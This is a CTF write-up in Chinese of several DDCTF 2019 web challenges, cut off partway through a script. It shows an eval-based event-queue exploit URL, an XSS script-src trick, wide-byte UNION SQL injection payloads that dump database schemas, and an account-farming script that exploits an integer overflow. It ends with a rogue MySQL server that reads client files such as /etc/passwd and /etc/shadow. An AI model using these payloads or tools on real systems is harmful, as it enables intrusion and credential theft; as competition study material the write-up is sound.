<p>这个方法是用来将要调用的事件放入队列中，当事件数量大于5时取后5个，然后能处理列表与字符串<br>最后调用<code>execute_event_loop()</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">def execute_event_loop():</span><br><span class="line">	valid_event_chars = set(&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789:;#&apos;)</span><br><span class="line">	resp = None</span><br><span class="line">	while len(request.event_queue) &gt; 0:</span><br><span class="line">		event = request.event_queue[0] # `event` is something like &quot;action:ACTION;ARGS0#ARGS1#ARGS2......&quot;</span><br><span class="line">		request.event_queue = request.event_queue[1:]</span><br><span class="line">		if not event.startswith((&apos;action:&apos;, &apos;func:&apos;)): continue</span><br><span class="line">		for c in event:</span><br><span class="line">			if c not in valid_event_chars: break</span><br><span class="line">		else:</span><br><span class="line">			is_action = event[0] == &apos;a&apos;</span><br><span class="line">			action = get_mid_str(event, &apos;:&apos;, &apos;;&apos;)</span><br><span class="line">			args = get_mid_str(event, action+&apos;;&apos;).split(&apos;#&apos;)</span><br><span class="line">			try:</span><br><span class="line">				event_handler = eval(action + (&apos;_handler&apos; if is_action else &apos;_function&apos;))</span><br><span class="line">				ret_val = event_handler(args)</span><br><span class="line">			except RollBackException:</span><br><span class="line">				if resp is None: resp = &apos;&apos;</span><br><span class="line">				resp += &apos;ERROR! All transactions have been cancelled. &lt;br /&gt;&apos;</span><br><span class="line">				resp += &apos;&lt;a href=&quot;./?action:view;index&quot;&gt;Go back to index.html&lt;/a&gt;&lt;br /&gt;&apos;</span><br><span class="line">				session[&apos;num_items&apos;] = request.prev_session[&apos;num_items&apos;]</span><br><span class="line">				session[&apos;points&apos;] = request.prev_session[&apos;points&apos;]</span><br><span class="line">				break</span><br><span class="line">			except Exception, e:</span><br><span class="line">				if resp is None: resp = &apos;&apos;</span><br><span class="line">				#resp += str(e) # only for debugging</span><br><span class="line">				continue</span><br><span class="line">			if ret_val is not None:</span><br><span class="line">				if resp is None: resp = ret_val</span><br><span class="line">				else: resp += ret_val</span><br><span class="line">	if resp is None or resp == &apos;&apos;: resp = (&apos;404 NOT FOUND&apos;, 404)</span><br><span class="line">	session.modified = True</span><br><span class="line">	return resp</span><br></pre></td></tr></table></figure>
<p>这个方法会将<code>trigger_event()</code>设置好的队列中所有的事件都遍历一遍，然后当事件非func和action开头时会直接结束。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">is_action = event[0] == &apos;a&apos;</span><br><span class="line">action = get_mid_str(event, &apos;:&apos;, &apos;;&apos;)</span><br><span class="line">args = get_mid_str(event, action+&apos;;&apos;).split(&apos;#&apos;)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">def get_mid_str(haystack, prefix, postfix=None):</span><br><span class="line">	haystack = haystack[haystack.find(prefix)+len(prefix):]</span><br><span class="line">	if postfix is not None:</span><br><span class="line">		haystack = haystack[:haystack.find(postfix)]</span><br><span class="line">	return haystack</span><br></pre></td></tr></table></figure>
<p>这里是event以a开头时is_action为真，反之。然后获得:和;之间的字符串作为方法名，然后;之后通过#分割的为传入的参数<br>再往下就是当is_action为真时连接_handle,否则连接_function。然后调用方法并传参，再接下去就是一堆异常处理<br>然后读一下比较重要的函数，比如这两个带flag的函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">def show_flag_function(args):</span><br><span class="line">	flag = args[0]</span><br><span class="line">	#return flag # GOTCHA! We noticed that here is a backdoor planted by a hacker which will print the flag, so we disabled it.</span><br><span class="line">	return &apos;You naughty boy! ;) &lt;br /&gt;&apos;</span><br><span class="line">	</span><br><span class="line">def get_flag_handler(args):</span><br><span class="line">	if session[&apos;num_items&apos;] &gt;= 5:</span><br><span class="line">		trigger_event(&apos;func:show_flag;&apos; + FLAG()) # show_flag_function has been disabled, no worries</span><br><span class="line">	trigger_event(&apos;action:view;index&apos;)</span><br></pre></td></tr></table></figure>
<p>可以看到show_flag_function直接访问也没有flag，get_flag_handler则需要我们购买的diamonds数大于等于5时才能获得flag<br>那就读一下<code>buy_handler()</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">def buy_handler(args):</span><br><span class="line">	num_items = int(args[0])</span><br><span class="line">	if num_items &lt;= 0: return &apos;invalid number(&#123;&#125;) of diamonds to buy&lt;br /&gt;&apos;.format(args[0])</span><br><span class="line">	session[&apos;num_items&apos;] += num_items </span><br><span class="line">	trigger_event([&apos;func:consume_point;&#123;&#125;&apos;.format(num_items), &apos;action:view;index&apos;])</span><br></pre></td></tr></table></figure>
<p>可以看到buy_handler函数之是进行了diamonds数的加操作，然后将<code>consume_point()</code>放入了队列中，于是再读一下<code>consume_point()</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">def consume_point_function(args):</span><br><span class="line">	point_to_consume = int(args[0])</span><br><span class="line">	if session[&apos;points&apos;] &lt; point_to_consume: raise RollBackException()</span><br><span class="line">	session[&apos;points&apos;] -= point_to_consume</span><br></pre></td></tr></table></figure>
<p><code>consume_point()</code>则是对points进行减，当要减的值小于diamonds时就会进行回滚，让diamonds还原<br>分析完源码，很奇怪buy_handler和consume_point为什么要分开写，或者先判断是否points足够不是更好吗，于是就想这之间会不会有什么逻辑漏洞存在。<br>如果说我们能在获得第5个diamonds时，在触发consume_point之前就先触发get_flag_handler，那我们不就能获得flag了。顺着这个想法，我们可以看到<code>trigger_event()</code>是可以将多个事件放入队列中的，而buy_handler是将consume_point放到队尾，那我们只要能往<code>trigger_event()</code>用列表传多个数据过去那不就可以了。而能用来传队列值的地方只有这里</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">event_handler = eval(action + (&apos;_handler&apos; if is_action else &apos;_function&apos;))</span><br><span class="line">ret_val = event_handler(args)</span><br></pre></td></tr></table></figure>
<p>这里我们可以用#来绕过，让后面接上的值无效。然后再传我们要执行的方法作为参数就ok<br>于是payload就是:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?action:trigger_event%23;action:buy;1%23action:buy;1%23action:get_flag;1</span><br></pre></td></tr></table></figure>
<p>这里不用%23会出错，然后get_flag_handle也是需要传值的，不然也是不行【这里是现在浏览器端进行了三次购买操作后的payload<br>最后再去cookie中拿出session解码获得flag</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/6176490e757c2628c38ee6f732a57d80.png" alt=""></p>
<p>不过这题我还有其他的想法，比如用<code>trigger_event()</code>给consume_point_function传入一个负数值也许可以让points变大？或者故意触发points不足，然后在回滚时是会去读取用户cookie里session中的值的，我们只要修改并加密，再将cookie回传不就可以获得将points设为任意我们想要的了？</p>
<h2 id="欢迎报名DDCTF"><a href="#欢迎报名DDCTF" class="headerlink" title="欢迎报名DDCTF"></a>欢迎报名DDCTF</h2><p>一道xss+sql注入的题<br>拿题先扫一下，发现了几个页面</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/1a22f584f84926e75b9075b90ff50cb2.png" alt=""></p>
<p>login怎么搞没什么效果，admin不允许访问，但题目提示了xss不是用来拿cookie，那应该是用来拿admin页面的源码，于是找xss注入点<br>在第三个输入框处有xss注入点，于是上<code>&lt;script src=&quot;//address&quot;&gt;</code>获得源码，不过复现时一直不行，可能是机器人关了？拿其他大佬搞到的代码时ok的来着<br>然后看拿到的admin源码，发现一个query_aIeMu0FUoVrW0NWPHbN6z4xh.php接口，于是访问一下提示传id，于是抓包发现编码时gbk</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/85996c7b5d75c299e698c82a20795264.png" alt=""></p>
<p>于是猜测可能是宽字节注入<br>然后尝试到5个参数时有回显，于是直接一个个读<br>Payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">3%df%27%20union%20select%201,2,3,4,5%23</span><br><span class="line">3%df%27%20union%20select%201,2,3,4,group_concat(schema_name)%20from%20information_schema.schemata%23</span><br><span class="line">3%df%27%20union%20select%201,2,3,4,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x6374666462%23</span><br><span class="line">3%df%27%20union%20select%201,2,3,4,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x6374665f66686d4852504c35%23</span><br><span class="line">3%df%27%20union%20select%201,2,3,4,group_concat(ctf_value)%20from%20ctfdb.ctf_fhmHRPL5%23</span><br></pre></td></tr></table></figure>
<p>最后这里没反应到不是同一个数据库卡了好久orz</p>
<h2 id="大吉大利-今晚吃鸡"><a href="#大吉大利-今晚吃鸡" class="headerlink" title="大吉大利,今晚吃鸡~"></a>大吉大利,今晚吃鸡~</h2><p>这题注册登录进去后，点击立即购买就会生成一个2000元的支付订单，然而并没有这么多钱，于是找绕过点。再次点击然后看看发送了什么请求</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/d57f62e1c1aecf663c3fc65deb157131.png" alt=""></p>
<p>发现了一个get传ticket_price的请求<br>抓包修改一下值提示不得小于2000元，用非数字直接出错<br>这里学到一个新姿势——整数溢出，当大于2^32时，最高位的1会溢出舍去，只剩后32位。于是这里我们传4294967297（2^32+1），然后再支付，这样我们实际上就只支付了1元<br>然后进到吃鸡界面发现要输入id和ticket淘汰对手，于是上脚本注册一堆小号一个个淘汰，最终得flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*- </span><br><span class="line">import base64</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">user_cookie = &#123;&apos;user_name&apos;:&apos;shifenghhh&apos;,&apos;REVEL_SESSION&apos;:&apos;0bf7b810d7a83663760923a04529c56c&apos;&#125;</span><br><span class="line"></span><br><span class="line">for i in range(1000):</span><br><span class="line">	user = &apos;shifenglooll&apos;+str(i)</span><br><span class="line">	url1 = &quot;http://117.51.147.155:5050/ctf/api/register?name=&quot;+user+&quot;&amp;password=123456789&quot;</span><br><span class="line">	http1 = requests.get(url1)</span><br><span class="line">	REVEL_SESSION = re.findall(r&quot;REVEL_SESSION=(.*?);&quot;,http1.headers[&apos;Set-Cookie&apos;])[0]</span><br><span class="line">	url2 = &quot;http://117.51.147.155:5050/ctf/api/buy_ticket?ticket_price=4294967299&quot;</span><br><span class="line">	cookie = &#123;&apos;user_name&apos;:user,&apos;REVEL_SESSION&apos;:REVEL_SESSION&#125;</span><br><span class="line">	http2 = requests.get(url2,cookies=cookie)</span><br><span class="line">	bill_id = re.findall(r&quot;\&quot;bill_id\&quot;:\&quot;(.*?)\&quot;,&quot;,http2.content)[0]</span><br><span class="line">	url3 = &quot;http://117.51.147.155:5050/ctf/api/pay_ticket?bill_id=&quot;+bill_id</span><br><span class="line">	http3 = requests.get(url3,cookies=cookie)</span><br><span class="line">	your_id = re.findall(r&quot;\&quot;your_id\&quot;:(.*?),&quot;,http3.content)[0]</span><br><span class="line">	your_ticket = re.findall(r&quot;\&quot;your_ticket\&quot;:\&quot;(.*?)\&quot;&quot;,http3.content)[0]</span><br><span class="line">	url4 = &quot;http://117.51.147.155:5050/ctf/api/remove_robot?id=&quot;+your_id+&quot;&amp;ticket=&quot;+your_ticket</span><br><span class="line">	http4 = requests.get(url4,cookies=user_cookie)</span><br><span class="line">	print http4.content</span><br></pre></td></tr></table></figure>
<p>【不会多线程呀（跪</p>
<p><img src="http://shifeng-kaze.cn/blog/DDCTF2019_web_wp/623f7b7ee7aa11cf41a472ad318e4c70.png" alt=""></p>
<h2 id="mysql弱口令"><a href="#mysql弱口令" class="headerlink" title="mysql弱口令"></a>mysql弱口令</h2><p>一道关于反mysql扫描器的题，进去提示将agent.py部署在公网服务器上，然后对mysql开启的端口进行弱密码扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Time    : 12/1/2019 2:58 PM</span><br><span class="line"># @Author  : fz</span><br><span class="line"># @Site    : </span><br><span class="line"># @File    : agent.py</span><br><span class="line"># @Software: PyCharm</span><br><span class="line"></span><br><span class="line">import json</span><br><span class="line">from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler</span><br><span class="line">from optparse import OptionParser</span><br><span class="line">from subprocess import Popen, PIPE</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class RequestHandler(BaseHTTPRequestHandler):</span><br><span class="line"></span><br><span class="line">    def do_GET(self):</span><br><span class="line">        request_path = self.path</span><br><span class="line"></span><br><span class="line">        print(&quot;\n----- Request Start -----&gt;\n&quot;)</span><br><span class="line">        print(&quot;request_path :&quot;, request_path)</span><br><span class="line">        print(&quot;self.headers :&quot;, self.headers)</span><br><span class="line">        print(&quot;&lt;----- Request End -----\n&quot;)</span><br><span class="line"></span><br><span class="line">        self.send_response(200)</span><br><span class="line">        self.send_header(&quot;Set-Cookie&quot;, &quot;foo=bar&quot;)</span><br><span class="line">        self.end_headers()</span><br><span class="line"></span><br><span class="line">        result = self._func()</span><br><span class="line">        self.wfile.write(json.dumps(result))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    def do_POST(self):</span><br><span class="line">        request_path = self.path</span><br><span class="line"></span><br><span class="line">        # print(&quot;\n----- Request Start -----&gt;\n&quot;)</span><br><span class="line">        print(&quot;request_path : %s&quot;, request_path)</span><br><span class="line"></span><br><span class="line">        request_headers = self.headers</span><br><span class="line">        content_length = request_headers.getheaders(&apos;content-length&apos;)</span><br><span class="line">        length = int(content_length[0]) if content_length else 0</span><br><span class="line"></span><br><span class="line">        # print(&quot;length :&quot;, length)</span><br><span class="line"></span><br><span class="line">        print(&quot;request_headers : %s&quot; % request_headers)</span><br><span class="line">        print(&quot;content : %s&quot; % self.rfile.read(length))</span><br><span class="line">        # print(&quot;&lt;----- Request End -----\n&quot;)</span><br><span class="line"></span><br><span class="line">        self.send_response(200)</span><br><span class="line">        self.send_header(&quot;Set-Cookie&quot;, &quot;foo=bar&quot;)</span><br><span class="line">        self.end_headers()</span><br><span class="line">        result = self._func()</span><br><span class="line">        self.wfile.write(json.dumps(result))</span><br><span class="line"></span><br><span class="line">    def _func(self):</span><br><span class="line">        netstat = Popen([&apos;netstat&apos;, &apos;-tlnp&apos;], stdout=PIPE)</span><br><span class="line">        netstat.wait()</span><br><span class="line"></span><br><span class="line">        ps_list = netstat.stdout.readlines()</span><br><span class="line">        result = []</span><br><span class="line">        for item in ps_list[2:]:</span><br><span class="line">            tmp = item.split()</span><br><span class="line">            Local_Address = tmp[3]</span><br><span class="line">            Process_name = tmp[6]</span><br><span class="line">            tmp_dic = &#123;&apos;local_address&apos;: Local_Address, &apos;Process_name&apos;: Process_name&#125;</span><br><span class="line">            result.append(tmp_dic)</span><br><span class="line">        return result</span><br><span class="line"></span><br><span class="line">    do_PUT = do_POST</span><br><span class="line">    do_DELETE = do_GET</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">    port = 8123</span><br><span class="line">    print(&apos;Listening on localhost:%s&apos; % port)</span><br><span class="line">    server = HTTPServer((&apos;0.0.0.0&apos;, port), RequestHandler)</span><br><span class="line">    server.serve_forever()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    parser = OptionParser()</span><br><span class="line">    parser.usage = (</span><br><span class="line">        &quot;Creates an http-server that will echo out any GET or POST parameters, and respond with dummy data\n&quot;</span><br><span class="line">        &quot;Run:\n\n&quot;)</span><br><span class="line">    (options, args) = parser.parse_args()</span><br><span class="line"></span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>这个agent.py应该是用来作为8123端口上的一个服务器，然后扫描器会从该端口进入访问我们准备好的端口<br>这题利用的是mysql中LOAD DATA INFILE这个语法，它在客户端具有CLIENT_LOCAL_FILES属性时，能够读取客户端的任意文件<br>具体看这<br><a href="https://lightless.me/archives/read-mysql-client-file.html" target="_blank" rel="noopener">Read MySQL Client’s File 
</a><br>于是我们可以伪造一个mysql服务端，修改连接请求，就能获得攻击方的文件<br>这里找了个github上写好的脚本，修改一下然后在服务器上运行，然后让扫描器扫描就可以了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line">#coding: utf8</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">import socket</span><br><span class="line">import asyncore</span><br><span class="line">import asynchat</span><br><span class="line">import struct</span><br><span class="line">import random</span><br><span class="line">import logging</span><br><span class="line">import logging.handlers</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PORT = 3307</span><br><span class="line"></span><br><span class="line">log = logging.getLogger(__name__)</span><br><span class="line"></span><br><span class="line">log.setLevel(logging.DEBUG)</span><br><span class="line"># tmp_format = logging.handlers.WatchedFileHandler(&apos;mysql.log&apos;, &apos;ab&apos;)</span><br><span class="line">tmp_format = logging.StreamHandler()</span><br><span class="line">tmp_format.setFormatter(logging.Formatter(&quot;%(asctime)s:%(levelname)s:%(message)s&quot;))</span><br><span class="line">log.addHandler(</span><br><span class="line">    tmp_format</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">filelist = (</span><br><span class="line">#    r&apos;c:\boot.ini&apos;,</span><br><span class="line">#    r&apos;c:\windows\win.ini&apos;,</span><br><span class="line">#    r&apos;c:\windows\system32\drivers\etc\hosts&apos;,</span><br><span class="line">    &apos;/etc/passwd&apos;,</span><br><span class="line">    # &apos;/root/.bash_history&apos;,</span><br><span class="line">    # &apos;/home/dc2-user/ctf_web_2/app/main/views.py&apos;,</span><br><span class="line">    # &apos;/var/lib/mysql/security/flag.idb&apos;,</span><br><span class="line">    # &apos;/root/.mysql_history&apos;,</span><br><span class="line">#    &apos;/etc/shadow&apos;,</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#================================================</span><br><span class="line">#=======No need to change after this lines=======</span><br><span class="line">#================================================</span><br><span class="line"></span><br><span class="line">__author__ = &apos;Gifts&apos;</span><br><span class="line"></span><br><span class="line">def daemonize():</span><br><span class="line">    import os, warnings</span><br><span class="line">    if os.name != &apos;posix&apos;:</span><br><span class="line">        warnings.warn(&apos;Cant create daemon on non-posix system&apos;)</span><br><span class="line">        return</span><br><span class="line"></span><br><span class="line">    if os.fork(): os._exit(0)</span><br><span class="line">    os.setsid()</span><br><span class="line">    if os.fork(): os._exit(0)</span><br><span class="line">    os.umask(0o022)</span><br><span class="line">    null=os.open(&apos;/dev/null&apos;, os.O_RDWR)</span><br><span class="line">    for i in xrange(3):</span><br><span class="line">        try:</span><br><span class="line">            os.dup2(null, i)</span><br><span class="line">        except OSError as e:</span><br><span class="line">            if e.errno != 9: raise</span><br><span class="line">    os.close(null)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class LastPacket(Exception):</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class OutOfOrder(Exception):</span><br><span class="line">    pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class mysql_packet(object):</span><br><span class="line">    packet_header = struct.Struct(&apos;&lt;Hbb&apos;)</span><br><span class="line">    packet_header_long = struct.Struct(&apos;&lt;Hbbb&apos;)</span><br><span class="line">    def __init__(self, packet_type, payload):</span><br><span class="line">        if isinstance(packet_type, mysql_packet):</span><br><span class="line">            self.packet_num = packet_type.packet_num + 1</span><br><span class="line">        else:</span><br><span class="line">            self.packet_num = packet_type</span><br><span class="line">        self.payload = payload</span><br><span class="line"></span><br><span class="line">    def __str__(self):</span><br><span class="line">        payload_len = len(self.payload)</span><br><span class="line">        if payload_len &lt; 65536:</span><br><span class="line">            header = mysql_packet.packet_header.pack(payload_len, 0, self.packet_num)</span><br><span class="line">        else:</span><br><span class="line">            header = mysql_packet.packet_header.pack(payload_len &amp; 0xFFFF, payload_len &gt;&gt; 16, 0, self.packet_num)</span><br><span class="line"></span><br><span class="line">        result = 